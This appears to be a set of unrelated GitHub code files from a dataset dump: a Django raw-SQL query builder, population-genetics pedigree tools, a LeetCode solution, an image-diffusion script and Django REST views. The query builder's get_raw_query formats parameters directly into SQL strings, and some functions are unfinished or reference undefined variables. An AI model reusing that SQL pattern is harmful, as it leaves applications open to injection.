","repo_name":"LuanMattos/circle-api-django","sub_path":"photo_statistic/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33789869059","text":"\"\"\"\n All this SQL is terribly horribly wrong.\n Django devs decided to get rid of subqueries in extra/tables\n https://djangosnippets.org/snippets/236/\n https://code.djangoproject.com/ticket/7907\n Explaining that raw() could replace it completely, but is doesn't.\n So we got what we've got. 
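\n\n    A minimal usage sketch (editorial addition; the table and field names\n    below are hypothetical, chosen only to illustrate the API):\n\n        q = Query(\n            conditions=[\"group_id = {group_id}\"],\n            params={\"group_id\": 42},\n            fields=[\"id\", \"name\"],\n            tables=[\"some_table\"],\n        )\n        q.get_raw_query()\n        # -> SELECT id, name FROM some_table WHERE(group_id = 42)\n\n    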
I kind of hate those guys now.\n    Also, there are some minor performance issues on pre-5.5 MySQL,\n    because it can't do a const subquery.\n\"\"\"\n\n\nclass Query(object):\n    \"\"\"\n        Helps to construct a custom SQL query.\n        It holds the params to pass to the ORM in an array.\n    \"\"\"\n    conditions = None\n    params = None\n    fields = None\n    tables = None\n\n    def __init__(self, conditions=None, params=None, fields=None, tables=None):\n        self.conditions = conditions or []\n        self.params = params or {}\n        self.fields = fields or []\n        self.tables = tables or []\n\n    def get_query(self):\n        conditions_string = \") AND (\".join(self.conditions)\n        tables_string = \", \".join(self.tables)\n        fields_string = \", \".join(self.fields)\n        result = \"SELECT {fields!s} FROM {tables!s}\".format(\n            fields=fields_string,\n            tables=tables_string\n        )\n        if self.conditions:\n            result += \" WHERE({conditions!s})\".format(conditions=conditions_string)\n        return result\n\n    def get_raw_query(self):\n        return self.get_query().format(**self.params)\n","repo_name":"grey0ne/django-protector","sub_path":"protector/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"63"} +{"seq_id":"15427038670","text":"import os\nimport pandas as pd\nimport numpy as np\nimport msprime\nimport networkx as nx\nimport tskit\nimport matplotlib.pyplot as plt\nimport itertools\n\ndef show_plots():\n    plt.ioff()\n    plt.show()\n\nclass Pedigree(tskit.TableCollection):\n    '''\n    A wrapper for a tskit TableCollection. Should be usable anywhere a TableCollection is usable.\n    '''\n\n    def __init__(self, table_collection: tskit.TableCollection):\n        table_copy = table_collection.copy()\n        self.__dict__ = table_copy.__dict__\n        self.generate_additional_pedigree_data()\n        return\n\n    def generate_additional_pedigree_data(self):\n        self.individuals.metadata_schema = tskit.MetadataSchema.permissive_json()\n        self.children_table = self.generate_children_table()\n        self.proband_individuals = self.get_proband_individuals()\n        self.proband_descendent_table = self.generate_proband_descendent_table()\n        return\n\n    def export_simple(self, filename):\n        return export_simple(self, filename)\n\n    def generate_proband_descendent_table(self):\n        return generate_proband_descendent_table(self)\n\n    def get_proband_genealogy(self, proband_individuals: list):\n        return get_proband_genealogy(self, proband_individuals)\n\n    def get_descendents_genealogy(self, ancestral_nodes: list):\n        return get_descendents_genealogy(self, ancestral_nodes)\n\n    def predicted_contribution(self):\n        return predicted_contribution(self)\n\n    def predict_contributions_coalescences(self):\n        return predict_contributions_coalescences(self)\n\n    def get_proband_individuals(self):\n        return get_proband_individuals(self)\n\n    def generate_children_table(self):\n        return generate_children_table(self)\n\n    def display(self, labels: dict = None, font_size=12, block=True):\n        draw_pedigree(self, labels=labels, font_size=font_size, block=block)\n\n    def relabel(self):\n        relabel(self)\n\ndef to_pedigree(pedigree: tskit.TableCollection) -> Pedigree:\n    '''\n    Converts a tskit TableCollection to a pedigree_tools Pedigree, in-place.\n    It is recommended to use Pedigree() instead of this method,\n    as Pedigree() returns a deep copy of the input TableCollection.\n    '''\n    pedigree.__class__ = Pedigree\n    pedigree.generate_additional_pedigree_data()\n    return pedigree\n\n\ndef relabel(pedigree: tskit.TableCollection):\n    '''\n    Sets 'label' metadata to the 
current individual ids. Useful for sorting/trimming pedigrees and retaining the same individual labels.\n '''\n for individual_id, individual in enumerate(pedigree.individuals):\n pedigree.individuals[individual_id] = individual.replace(metadata={'label':individual_id})\n return\n\n\ndef generate_children_table(pedigree: tskit.TableCollection):\n '''\n Generates a dictionary mapping each individual to its children.\n '''\n children_table = {}\n for individual_id, individual in enumerate(pedigree.individuals):\n for parent in individual.parents:\n if parent != -1:\n if parent not in children_table:\n children_table[parent] = set()\n children_table[parent].add(individual_id)\n return children_table\n\ndef generate_proband_descendent_table(pedigree: tskit.TableCollection):\n '''\n Generates a dictionary mapping each individual to its proband descendents.\n '''\n proband_descendent_table = {}\n if isinstance(pedigree, Pedigree):\n proband_individuals = pedigree.proband_individuals\n children_table = pedigree.children_table\n else:\n proband_individuals = get_proband_individuals(pedigree)\n children_table = generate_children_table(pedigree)\n for individual_id in proband_individuals:\n proband_descendent_table[individual_id] = {individual_id}\n \n def _get_proband_descendents(individual_id):\n if individual_id not in proband_descendent_table:\n proband_descendent_table[individual_id] = set()\n if individual_id not in children_table:\n return proband_descendent_table[individual_id]\n for child_id in children_table[individual_id]:\n proband_descendent_table[individual_id].update(_get_proband_descendents(child_id))\n\n return proband_descendent_table[individual_id]\n\n for individual_id in range(len(pedigree.individuals)):\n _get_proband_descendents(individual_id)\n return proband_descendent_table\n\ndef generate_pedigree(num_probands=None, population_size=None, end_time=None, num_pedigrees=None, random_seed=None) -> Pedigree | list[Pedigree]:\n '''\n Generates a pedigree with the specified number of sample individuals, out of a population of the specified size, with the specified number of generations.\n '''\n if population_size is None:\n raise ValueError('Population size must be specified.')\n if num_probands is not None and num_probands > population_size:\n raise ValueError('Number of probands cannot be larger than the size of the population.')\n \n pedigrees = []\n for i in range(1 if num_pedigrees == None else num_pedigrees):\n pedigree = msprime.pedigrees.sim_pedigree(population_size=population_size, random_seed=random_seed+i, sequence_length=1, end_time=end_time)\n to_pedigree(pedigree)\n if num_probands is None:\n pedigrees.append(pedigree)\n else:\n pedigrees.append(pedigree.get_proband_genealogy(itertools.islice(pedigree.proband_individuals, num_probands)))\n\n if num_pedigrees == None:\n return pedigrees[0]\n else:\n return pedigrees\n\ndef get_proband_individuals(pedigree: tskit.TableCollection):\n ped_ts = pedigree.tree_sequence()\n sample_ids = set()\n for node_id in ped_ts.samples():\n sample_ids.add(ped_ts.nodes_individual[node_id])\n return sample_ids\n\ndef get_proband_genealogy(pedigree: tskit.TableCollection, chosen_probands):\n '''\n Gets the genealogical history of the chosen probands from the pedigree.\n In other words, this removes all individuals from a pedigree that are not ancestral to the chosen probands.\n Input: A number of sample individuals and a pedigree including those individuals\n Output: A pedigree with all individuals other than the chosen probands and their 
ancestors removed.\n '''\n if isinstance(chosen_probands, set):\n chosen_proband_set = chosen_probands\n else:\n chosen_proband_set = set(chosen_probands)\n if isinstance(pedigree, Pedigree):\n proband_descendent_table = pedigree.proband_descendent_table\n else:\n proband_descendent_table = generate_proband_descendent_table(pedigree)\n relevant_nodes = [node_id for node_id, node in enumerate(pedigree.nodes) if intersects(chosen_proband_set, proband_descendent_table[node.individual])]\n #print(relevant_nodes)\n subset_pedigree = pedigree.copy()\n subset_pedigree.subset(relevant_nodes)\n to_pedigree(subset_pedigree)\n return subset_pedigree\n\ndef individual_stat_from_nodes(node_stats, pedigree: tskit.TableCollection):\n pedigree.sort_individuals()\n #print(node_stats)\n individual_stats = np.zeros(int(len(node_stats)/2))\n #print(individual_stats)\n for node_id, stat in enumerate(node_stats):\n individual_stats[pedigree.nodes[node_id].individual] += stat[0]\n print\n return individual_stats\n\ndef intersects(a: set, b: set):\n '''\n Returns True if there is any intersection between a and b\n '''\n return not a.isdisjoint(b)\n\ndef get_descendents_genealogy(pedigree: tskit.TableCollection, ancestral_individuals: list):\n '''\n Gets the genealogical history of all descendents of the chosen individuals.\n In other words, this removes all individuals from a pedigree that are not ancestral to the descendents of the chosen node.\n Input: A number of sample individuals and a pedigree including those individuals.\n Output: A pedigree with all individuals other than the descendents of chosen individuals, and their ancestors, removed.\n '''\n chosen_proband_set = set()\n if isinstance(pedigree, Pedigree):\n proband_descendent_table = pedigree.proband_descendent_table\n else:\n proband_descendent_table = generate_proband_descendent_table(pedigree)\n for ancestral_id in ancestral_individuals:\n chosen_proband_set.update(proband_descendent_table[ancestral_id])\n\n return get_proband_genealogy(pedigree, chosen_proband_set)\n\ndef export_simple(pedigree: tskit.TableCollection, filename):\n with open(filename, 'w') as file:\n for individual_id, individual in enumerate(pedigree.individuals):\n file.write(f'{individual_id} {individual.parents[0]} {individual.parents[1]}\\n')\n\ndef draw_pedigree(pedigree: tskit.TableCollection, labels = None, font_size=12, block=True):\n '''\n Creates a matplotlib plot of a tskit pedigree.\n ''' \n ped_ts = pedigree.tree_sequence()\n G = nx.DiGraph()\n if labels is None:\n labels = {}\n for ind in ped_ts.individuals():\n if isinstance(ind.metadata, dict):\n if 'label' in ind.metadata:\n labels[ind.id] = ind.metadata['label']\n elif 'file_id' in ind.metadata:\n labels[ind.id] = ind.metadata['file_id']\n if ind.id not in labels:\n labels[ind.id] = ind.id\n time = ped_ts.node(ind.nodes[0]).time\n pop = ped_ts.node(ind.nodes[0]).population\n G.add_node(ind.id, time=time, population=pop)\n for p in ind.parents:\n if p != tskit.NULL:\n G.add_edge(ind.id, p)\n pos = nx.multipartite_layout(G, subset_key=\"time\", align=\"horizontal\")\n colours = plt.rcParams['axes.prop_cycle'].by_key()['color']\n node_colours = [colours[node_attr[\"population\"]] for node_attr in G.nodes.values()]\n fig, axes = plt.subplots(nrows=1, ncols=1)\n \n nx.draw_networkx(G, pos, with_labels=True, labels=labels, node_color=node_colours, font_size=font_size, ax=axes, bbox={'fc':'r'})\n if block==False:\n plt.ion()\n plt.show()\n\ndef predicted_contribution(pedigree: tskit.TableCollection):\n 
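'''\n    Editorial summary, inferred from the code below (not the author's text):\n    returns each individual's expected genetic contribution to the probands.\n    Each proband starts at 2 (one per genome copy of a diploid individual);\n    iterating from youngest to oldest, each parent then receives half of\n    every child's value.\n    '''\n    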
pedigree.sort_individuals()\n    ped_ts = pedigree.tree_sequence()\n    proband_ids = get_proband_individuals(pedigree)\n    contribution = np.zeros(ped_ts.num_individuals)\n    #print([ind for ind in ped_ts.individuals()])\n    #print(sample_ids)\n    for ind in reversed(ped_ts.individuals()):\n        if ind.id in proband_ids:\n            contribution[ind.id] = 2\n        if ind.parents[0] != -1:\n            contribution[ind.parents[0]] += 0.5*contribution[ind.id]\n            #print(ind.id, contribution[ind.id], ind.parents[0], contribution[ind.parents[0]])\n        if ind.parents[1] != -1:\n            contribution[ind.parents[1]] += 0.5*contribution[ind.id]\n            #print(ind.id, contribution[ind.id], ind.parents[1], contribution[ind.parents[1]])\n    return contribution\n\ndef predict_contributions_coalescences(pedigree: tskit.TableCollection):\n    pedigree.sort_individuals()\n    ped_ts = pedigree.tree_sequence()\n    proband_ids = get_proband_individuals(pedigree)\n    contributions = [[] for i in range(ped_ts.num_individuals)]\n    contribution_sum = np.zeros(ped_ts.num_individuals)\n    coalescences = np.zeros(ped_ts.num_individuals)\n    for ind in reversed(ped_ts.individuals()):\n        if ind.id in proband_ids:\n            contributions[ind.id] = [2]\n        contribution_sum[ind.id] = sum(contributions[ind.id])\n        coalescences[ind.id] = (sum(contributions[ind.id])**2 - sum(contribution**2 for contribution in contributions[ind.id]))/4\n        if ind.parents[0] != -1:\n            contributions[ind.parents[0]].append(0.5*contribution_sum[ind.id])\n            #print(ind.id, contribution[ind.id], ind.parents[0], contribution[ind.parents[0]])\n        if ind.parents[1] != -1:\n            contributions[ind.parents[1]].append(0.5*contribution_sum[ind.id])\n            #print(ind.id, contribution[ind.id], ind.parents[1], contribution[ind.parents[1]])\n    return contribution_sum, coalescences\n\ndef predicted_cross_coalescent(pedigree: tskit.TableCollection):\n    contribution = predicted_contribution(pedigree)\n    return contribution\n\ndef load_and_verify_pedigree(fname):\n    \"\"\"\n    Output: verified four-column pedigree dataframe\n\n    Input:\n        fname: string giving location of txt_ped-formatted genealogy.\n        columns represent: ind, mother, father, generation (lon, lat are optional)\n\n    This function:\n        checks if the file exists,\n        sorts the table in descending genealogical order (oldest to newest),\n        identifies pedigree founders and assigns them -1 values\n    \"\"\"\n    # ensure file exists (and close the handle again right away)\n    try:\n        with open(fname, 'rb'):\n            pass\n    except FileNotFoundError:\n        print(\"file {} does not exist\".format(fname))\n        raise\n\n    # genealogy_table instead of fp\n\n    # load the genealogy file\n    fp = pd.read_csv(fname)\n    # reverse sort by pseudo-time such that parents are before their children\n    #fp = fp.sort_values([\"generation\"], ascending = (False)).reset_index(drop=True)\n\n    # identify and recode founder individuals\n\n    # these are the individuals in the pedigree\n    ped_inds = fp[\"ind\"].values\n    # assign -1 to founding fathers\n    fp.loc[~fp[\"father\"].isin(ped_inds), \"father\"] = -1\n    # assign -1 to founding mothers\n    fp.loc[~fp[\"mother\"].isin(ped_inds), \"mother\"] = -1\n\n    return fp\n\ndef convert_txt_to_msprime(inFile: str, outFile: str):\n    \"\"\"\n    Converts a txt_ped-formatted genealogy to the msprime format, and saves it as a new file.\n    :param str inFile: Name of the input text file.\n    :param str outFile: Name of the output text file.\n    \"\"\"\n    fp = load_and_verify_pedigree(inFile)\n    fp.rename(columns = {'ind':'id', 'mother':'parent0', 'father':'parent1', 'generation':'time' }, inplace = True)\n\n    fp = fp.replace(-1, '.')\n    fp[\"time\"] = fp[\"time\"].astype(float)\n    fp[\"is_sample\"] = 1\n    
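# Editorial note: the steps above/below appear to target msprime's text-pedigree\n    # format, which expects a header line prefixed with \"# \" and '.' in place of\n    # unknown parents -- hence the replace(-1, '.') above and the leading '# '\n    # written into the output file below.\n    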
#print(fp.to_string())\n prep = open(outFile, 'w')\n prep.write('# ')\n prep.close()\n fp.to_csv(outFile, sep=' ', mode='a', index=False)\n\ndef add_individuals_to_pedigree(pb, text_pedigree, f_pop, p_pop):\n \"\"\"\n Output: PedigreeBuilder object built from text_pedigree\n\n Input:\n pb: an msprime builder pedigree with a predefined demography\n text_pedigree: four column text pedigree from load_and_verify_genealogy\n\n This function:\n loops through each individual in text pedigree\n adds individual to msprime pedigree with:\n parents, time, population and metadata of individual_name from text pedigree\n \"\"\"\n # dictionaries linking text_pedigree ids to msprime ids\n txt_ped_to_tskit_key = {}\n\n # determine if lon lat present in text pedigree\n if {'lon', 'lat'}.issubset(text_pedigree.columns):\n geo = True\n else :\n geo = False\n\n # determine if marriage date present in text pedigree\n if {'datem'}.issubset(text_pedigree.columns):\n date = True\n else :\n date = False\n\n # determine if marriage decade present in text pedigree\n if {'decade'}.issubset(text_pedigree.columns):\n decade = True\n else :\n decade = False\n\n # determine if new id is present in text pedigree\n if {'new_id'}.issubset(text_pedigree.columns):\n new_id = True\n else :\n new_id = False\n\n # for each individual in the genealogy\n for i in text_pedigree.index:\n # relevant information to load into PedigreeBuilder\n ind_time = text_pedigree[\"generation\"][i]\n ind_id = text_pedigree[\"ind\"][i]\n father_id = text_pedigree[\"father\"][i]\n mother_id = text_pedigree[\"mother\"][i]\n\n # add father\n if father_id == -1 :\n father = pb.add_individual(time=ind_time+1,\n population=f_pop,\n metadata={\"individual_name\": str(father_id)})\n else:\n try:\n father = txt_ped_to_tskit_key[father_id]\n except KeyError:\n print(\"father key missing, check order of dictionary construction\")\n raise\n\n # add mother\n if mother_id == -1 :\n mother = pb.add_individual(time=ind_time+1,\n population=f_pop,\n metadata={\"individual_name\": str(mother_id)})\n\n else:\n try:\n mother = txt_ped_to_tskit_key[mother_id]\n except KeyError:\n print(\"mother key missing, check order of dictionary construction\")\n raise\n\n if geo and date and decade and new_id :\n metadata={\"individual_name\": str(ind_id),\n \"geo_coord\":[text_pedigree[\"lat\"][i],text_pedigree[\"lon\"][i]],\n \"date\":str(text_pedigree[\"datem\"][i]),\n \"decade\":str(text_pedigree[\"decade\"][i]),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n elif geo and date and new_id :\n metadata={\"individual_name\": str(ind_id),\n \"geo_coord\":[text_pedigree[\"lat\"][i],text_pedigree[\"lon\"][i]],\n \"date\":str(text_pedigree[\"datem\"][i]),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n elif geo and decade and new_id :\n metadata={\"individual_name\": str(ind_id),\n \"geo_coord\":[text_pedigree[\"lat\"][i],text_pedigree[\"lon\"][i]],\n \"decade\":str(text_pedigree[\"decade\"][i]),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n elif new_id :\n metadata={\"individual_name\": str(ind_id),\n \"new_id\":str(text_pedigree[\"new_id\"][i]),\n }\n else :\n metadata={\"individual_name\": str(ind_id)}\n # add individual\n child = pb.add_individual(time=ind_time,\n parents=[mother,father],\n population=p_pop,\n metadata=metadata)\n\n # update dictionary for downstream\n txt_ped_to_tskit_key[ind_id] = child # store for later use (?)\n\n return pb\n\ndef del_sensitive_metadata(md):\n del md[\"date\"]\n del md[\"new_id\"]\n\n return md\n\ndef 
censor_pedigree(ts):\n \"\"\"\n Output: a censored tree sequence (i.e. without parent-child links or IDs)\n\n Input:\n ts: a tree sequence\n\n This function:\n removes all sensitive metadata from the input text pedigree\n specifically, it removes:\n - individual_names\n - parents of each individual\n \"\"\"\n\n tables = ts.dump_tables()\n\n new_metadata = [del_sensitive_metadata(i.metadata) for i in tables.individuals]\n\n validated_metadata = [\n tables.individuals.metadata_schema.validate_and_encode_row(row) for row in new_metadata\n ]\n tables.individuals.packset_metadata(validated_metadata)\n\n # remove parents\n tables.individuals.packset_parents([[]] * tables.individuals.num_rows)\n\n censored_ts = tables.tree_sequence()\n\n return(censored_ts)\n\ndef clean_pedigree_for_publication(ts):\n \"\"\"\n Output: a cleaned tree sequence file (i.e. clean metadata, provenances, etc.)\n\n Input:\n ts: a tree sequence\n\n This function:\n removes useless metadata and provenances from the input tree sequence\n specifically:\n - sets geographical coordinates to `location`\n - only keeps the first two provenance entries\n - only keeps metadata cleared for publication\n \"\"\"\n # ensure pedigree is censored\n ts = censor_pedigree(ts)\n\n # load tables\n tables = ts.dump_tables()\n # only keep first two entries of provenances\n tables.provenances.truncate(2)\n # get the lat and lon for each individual\n location = np.array(list(ind.metadata[\"geo_coord\"] for ind in ts.individuals()))\n\n n = ts.num_individuals\n\n # set the location to lat/lon\n tables.individuals.set_columns(\n flags=tables.individuals.flags,\n location=location.reshape(2 * n),\n location_offset=2 * np.arange(n + 1, dtype=np.uint64),\n metadata=tables.individuals.metadata,\n metadata_offset=tables.individuals.metadata_offset)\n\n clean_ts = tables.tree_sequence()\n return(clean_ts)\n\ndef simulate_genomes_with_known_pedigree(\n text_pedigree,\n demography,\n model = \"hudson\", # model to recapitulate tree\n f_pop = \"EUR\", # population id of founders\n p_pop = \"EUR\", # population id in pedigree\n mutation_rate = 3.62e-8,\n rate_map = 1.20e-8,\n sequence_length = 1,\n sequence_length_from_assembly = 1,\n centromere_intervals = [0,0],\n censor = True,\n seed = 123\n ):\n \"\"\"\n Output: simulated genomes using input text pedigree\n\n Input:\n text_pedigree: four column text pedigree from load_and_verify_genealogy\n demography: msprime demography specification\n model: used to recapitulate the fixed pedigree -- \"hudson\" or \"WF\"\n f_pop: population id of founders\n p_pop: population id in pedigree\n sequence_length: genome length of tree sequence\n sequence_length_from_assembly: length including telomeres\n rate_map: recombination rate map defined by load_rate_map\n mtuation_rate: mutation rate used for dropping mutations down tree sequence\n seed: random seed used in simulations\n\n This function:\n initializes an msprime PedigreeBuilder from demography\n builds a pedigree using the input text_pedigree\n runs msprime.sim_ancestry within fixed pedigree (default diploid)\n using the recombination rate provided\n drops mutations down tree using provided mutation rate\n \"\"\"\n # demography used to recapitulate beyond input pedigree\n pb = msprime.PedigreeBuilder(demography)\n\n # build pedigree using input pedigree\n pb = add_individuals_to_pedigree(pb, text_pedigree, f_pop, p_pop)\n\n # check simple model https://github.com/tskit-dev/msprime/blob/57ef4ee3267cd9b8e711787539007b0cde94c55c/tests/test_pedigree.py#L151\n\n # 
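Editorial note: finalise() below bakes the fixed pedigree into an initial\n    # tree-sequence state; the first sim_ancestry call then simulates within it\n    # (model=\"fixed_pedigree\"), the second recapitates the founders under the\n    # given demography, and sim_mutations finally adds mutations.\n    # 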
initial state of tree sequence\n ts = pb.finalise(sequence_length = sequence_length)\n\n # simulation within fixed pedigree\n ts = msprime.sim_ancestry(\n initial_state = ts,\n recombination_rate = rate_map,\n model = \"fixed_pedigree\",\n random_seed = seed + 100\n )\n\n # simulation beyond fixed pedigree\n ts = msprime.sim_ancestry(\n initial_state = ts,\n recombination_rate = rate_map,\n demography = demography,\n random_seed = seed + 200,\n model = model # Could also do WF\n )\n # drop mutations down the tree\n ts = msprime.sim_mutations(\n ts,\n rate = mutation_rate,\n random_seed = seed + 300\n )\n\n if(censor): ts = censor_pedigree(ts)\n\n # remove centromere\n ts = ts.delete_intervals(intervals = centromere_intervals)\n # modify sequence length to include `right` telomere\n tables = ts.dump_tables()\n tables.sequence_length = sequence_length_from_assembly\n ts = tables.tree_sequence()\n return ts\n\ndef simulation_sanity_checks(ts, ped):\n \"\"\"\n ts is the output of run_fixed_pedigree_simulation\n text_pedigree is the output of load_and_verify_genealogy\n \"\"\"\n\n # probands are by definition at generation 0\n probands = ped.loc[ped['generation'] == 0][\"ind\"].values\n\n # reacall diploids have two nodes per sample\n assert ts.num_samples == 2 * len(probands)\n\n # TODO : assert samples IDs are the correctly stored\n #ts.tables.individuals[5].metadata['individual_name']\n\n pass\n\ndef drop_mutations_again(\n ts,\n inside_mut = 2.36e-8,\n outside_mut = 3.62e-8,\n seed = 0,\n ):\n \"\"\"\n Output: tree sequence with a new set of mutations\n\n Input:\n ts: a tree sequence\n inside_mut: mutation rate used _inside_ fixed pedigree\n outside_mut: mutation rate use _outside_ fixed pedigree\n\n NOTE: outisde_mut should match the one used in the demographic model.\n\n This function:\n removes all sites and mutations from the input tree sequence\n drops mutations down tree using provided the two mutation rates\n the optional seed argument can be used to generate new simulations\n \"\"\"\n\n # load tables\n tables = ts.dump_tables()\n # remove sites\n tables.sites.clear()\n # remove mutations\n tables.mutations.clear()\n # turn this back into a tree sequence\n ts_nomuts = tables.tree_sequence()\n\n # cut tree seuquence into two based on start_time and end_time\n # ts_nomuts_inside =\n # ts_nomuts_outside =\n\n # drop mutations down the tree\n ts_inside = msprime.sim_mutations(\n ts_nomuts_inside,\n rate = inside_mut,\n random_seed = seed\n )\n\n # drop mutations down the tree\n ts_outside = msprime.sim_mutations(\n ts_nomuts_outside,\n rate = outside_mut,\n random_seed = seed\n )\n\n # ts_out = ts_inside + ts_outside\n\n #return(ts)\n pass\n\n","repo_name":"General-Solution/pedigree_tools","sub_path":"pedigree_tools.py","file_name":"pedigree_tools.py","file_ext":"py","file_size_in_byte":25593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30260443874","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) == 0:\n return 0\n Dict = {s[0]:0}\n DP = [1]\n for i in range(1, len(s)):\n if s[i] not in Dict:\n DP.append(DP[i - 1] + 1)\n else:\n DP.append(min(DP[i - 1] + 1, i - Dict[s[i]]))\n Dict[s[i]] = i\n return 
max(DP)\n","repo_name":"iicceeddssooddaa/LeetCode","sub_path":"#0003_Longest_Substring_Without_Repeating_Characters.py","file_name":"#0003_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33934101397","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 27 14:30:18 2015\n\n@author: yann\n\"\"\"\n\nimport numpy as np\nfrom scipy import ndimage, misc\nimport matplotlib.pyplot as plt\nimport skimage\n\n\ndef c(I, alpha):\n # diffusion coefficient\n # I: image\n # alpha: diffusion parameter\n return np.exp(-(I/alpha)**2)\n\n\ndef nonlinearDiffusion(I, nbIter, alpha, dt):\n # linear diffusion\n # I: image\n # nbIter: number of iterations\n # dt: step time\n hW = np.array([[1, -1, 0]])\n hE = np.array([[0, -1, 1]])\n hN = np.transpose(hW)\n hS = np.transpose(hE)\n\n Z = I\n\n for i in range(nbIter):\n #print \"%d\" % i\n gW = ndimage.convolve(Z, hW, mode='constant')\n gE = ndimage.convolve(Z, hE, mode='constant')\n gN = ndimage.convolve(Z, hN, mode='constant')\n gS = ndimage.convolve(Z, hS, mode='constant')\n\n Z = Z + dt*(c(np.abs(gW), alpha)*gW + c(np.abs(gE), alpha)*gE\n + c(np.abs(gN), alpha)*gN + c(np.abs(gS), alpha)*gS)\n\n return Z\n\n\nalpha = 0.1\ndt = .05\nI = skimage.io.imread(\"cerveau.png\")/255.\n\nF = nonlinearDiffusion(I, 10, alpha, dt)\nF2 = nonlinearDiffusion(I, 50, alpha, dt)\nskimage.io.imsave(\"cerveau_nld_10.png\", F)\nskimage.io.imsave(\"cerveau_nld_50.png\", F2)\nplt.subplot(1, 3, 1)\nplt.imshow(I, cmap=plt.cm.gray)\nplt.subplot(1, 3, 2)\nplt.imshow(F, cmap=plt.cm.gray)\nplt.subplot(1, 3, 3)\nplt.imshow(F2, cmap=plt.cm.gray)\n","repo_name":"yg42/iptutorials","sub_path":"TB_IPR/TUT.IMG.pde/python/nonlineardiffusion.py","file_name":"nonlineardiffusion.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"63"} +{"seq_id":"36260241396","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom Stat.models import Service, Stat\nfrom Stat.serializers import ServiceSerializer, StatSerializer\nfrom facilitators.models import Facilitator\nfrom facilitators.serializers import FacilitatorSerializer\n\n\n@api_view([\"GET\"])\ndef apiOverview(request):\n routes = {\n 'overview: /api/',\n 'Stats(GET, PUT, POST): /api/stats/',\n 'Stats detail(POST): /api/stats//',\n }\n return Response(routes)\n\n@api_view([\"GET\",\"POST\",\"PUT\",\"DELETE\"])\ndef stats(request, pk=None):\n # get single stat\n if pk and request.method == \"GET\":\n task = Stat.objects.get(id=pk)\n serializer = StatSerializer(task, many=False)\n\n # update stat\n elif pk and request.method == \"PUT\":\n task = Stat.objects.get(id=pk)\n serializer = StatSerializer(instance=task, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n \n # create new stat\n elif not pk and request.method == \"POST\":\n serializer = StatSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n \n # get all stats\n elif not pk and request.method == \"GET\":\n tasks = Stat.objects.all()\n serializer = StatSerializer(tasks, many=True)\n \n return Response(serializer.data)\n\n@api_view([\"GET\",\"POST\",\"PUT\",\"DELETE\"])\ndef serviceApiView(request, pk=None, stat_pk=None):\n # get services\n if stat_pk and request.method == \"GET\":\n stat = Stat.objects.get(id=stat_pk)\n services = 
Service.objects.filter(stat=stat)\n        serializer = ServiceSerializer(services, many=True)\n\n    # update services\n    elif stat_pk and request.method == \"PUT\":\n        for service in request.data:\n            service_instance = Service.objects.get(id=int(service['id']))\n            service_serializer = ServiceSerializer(instance=service_instance, data=service)\n            # save\n            if service_serializer.is_valid():\n                service_serializer.save()\n\n        stat = Stat.objects.get(id=stat_pk)\n        services = Service.objects.filter(stat=stat)\n        serializer = ServiceSerializer(services, many=True)\n\n        response = {\n            'status': 200,\n            'data': serializer.data\n        }\n\n        return Response(response)\n\n        # if serializer.is_valid():\n        #     serializer.save()\n\n    # create new services\n    elif stat_pk and request.method == \"POST\":\n        serializer = StatSerializer(data=request.data)\n\n        if serializer.is_valid():\n            serializer.save()\n\n    # get all stats\n    elif not pk and request.method == \"GET\":\n        tasks = Stat.objects.all()\n        serializer = StatSerializer(tasks, many=True)\n\n    return Response(serializer.data)\n\n@api_view([\"GET\",\"PUT\"])\ndef facilitatorChecklistView(request, stat_pk=None, service_pk=None):\n    # default response, so a GET without stat_pk still returns something\n    return_list = []\n\n    if request.method == 'GET' and stat_pk:\n        stat = Stat.objects.get(id=stat_pk)\n\n        for service in stat.services.all():\n            fs = service.facilitators_available.all()\n            serializer = FacilitatorSerializer(fs, many=True)\n            return_list.append({\n                'id': service.id,\n                'service': service.name,\n                'facilitators': serializer.data\n            })\n\n    if request.method == 'PUT':\n        updated_service: dict = request.data\n        service = Service.objects.get(id=updated_service.get('id'))\n\n        facilitators = []\n        # first we create a list of the facilitator models received\n        for dic in updated_service.get('facilitators'):\n            # facilitator match\n            fmatch = Facilitator.objects.get(id=dic.get('id'))\n            facilitators.append(fmatch)\n\n        # clear the facilitators available field\n        service.facilitators_available.clear()\n        # set the list as the cleared field\n        service.facilitators_available.set(facilitators)\n        # save the service\n        service.save()\n\n        return_list = True\n\n\n    return Response(return_list)\n\n@api_view([\"GET\"])\ndef facilitatorsApiView(request):\n    if request.method == 'GET':\n        fs = Facilitator.objects.filter(active=True)\n        serializer = FacilitatorSerializer(fs, many=True)\n        return Response(serializer.data)\n","repo_name":"eliHeist/morphstats","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40850306606","text":"import string\nimport pandas as pd\nimport numpy as np\nimport re\nimport spacy\nimport gensim\nimport gensim.corpora as corpora\n\nfrom typing import Dict, List, Tuple, Generator\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom wordcloud import WordCloud\nfrom gensim.utils import simple_preprocess\n\n\n\ndef clean_text(dataframe: pd.DataFrame) -> List[List[str]]:\n    nlp = spacy.load(\"en_core_web_sm\")\n    documents = dataframe[\"commit_message\"].to_list()\n    stop_words = stopwords.words(\"english\")\n    